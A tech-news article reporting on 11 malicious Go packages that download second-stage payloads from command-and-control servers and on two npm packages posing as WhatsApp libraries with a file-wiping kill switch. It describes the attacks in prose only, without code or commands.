- Researchers found 11 new malicious Go packages delivering remote payloads on Windows and Linux.
- These packages contain hidden loaders that can download additional Malware from several command-and-control (C2) servers.
- The decentralized Go module system makes it easier for attackers to trick developers into using harmful code.
- Two npm packages disguised as WhatsApp socket libraries have a kill switch that can wipe developers’ files if certain conditions are met.
- The threat highlights continued risks in open-source software supply chains, with attackers exploiting trusted channels to spread malware.
Cybersecurity researchers identified 11 Go programming language packages distributing malicious code that targets both Windows and Linux devices. The discovery took place in early August 2025, when security teams observed these packages attempting to download and execute harmful payloads from remote servers.
According to Socket security researcher Olivia Brown, “At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory,” as detailed in a recent report. The affected packages, including those named linker, stm, opt, and others, are available via GitHub repositories and are designed to deceive developers with credible names.
The packages contain code designed to hide a loader, which then fetches additional programs in ELF (for Linux) or PE (for Windows) formats. These second-stage payloads gather device details, access web browser information, and contact their control servers. “Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise,” Brown said.
Socket noted that the broad and decentralized Go module system contributes to the risk. Developers can directly import modules from any GitHub repository, and attackers create malicious packages using names that seem trustworthy. This strategy increases the risk that unsuspecting developers will use packages containing malware.
The research team suspects a single threat actor created these 11 packages because of similarities in their code and shared C2 infrastructure. The incident underlines ongoing threats in open-source software distribution channels, as malware authors keep using these systems to reach a wider range of victims.
In addition, two npm packages, naya-flore and nvlore-hsc, were found to pose as WhatsApp socket libraries and contain a remote “kill switch.” If a tested phone number is not on an Indonesian phone number list retrieved from a GitHub repository, the packages run a script to erase all files on the system after WhatsApp pairing. As of now, these libraries remain available on npm and have over 1,100 downloads.
Security researcher Kush Pandya also revealed that “naya-flore also contains a hardcoded GitHub Personal Access Token that provides unauthorized access to private repositories.” This token’s purpose is unclear, and parts of the code meant for collecting device information are currently disabled, indicating possible further development.
Experts from Fortinet FortiGuard Labs explained that attackers rely on established methods, including script-based installation and data theft. They also warned that “A continued rise in obfuscation also further notes the importance of vigilance and ongoing monitoring required by users of these services.” As open-source software use grows, so does the risk in the software supply chain.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Chainlink Unveils Strategic LINK Token Reserve to Boost Ecosystem
- Mysterious ‘Dark Exchanges’ Drive $6B in Solana Trading Volume
- BOB Raises $9.5M to Launch Bitcoin-Ethereum DeFi Mainnet Bridge
- Samsung Expands iPhone Chip Production in Texas Amid Tariffs
- Marex First to Use JPMorgan’s Kinexys Blockchain for Settlements
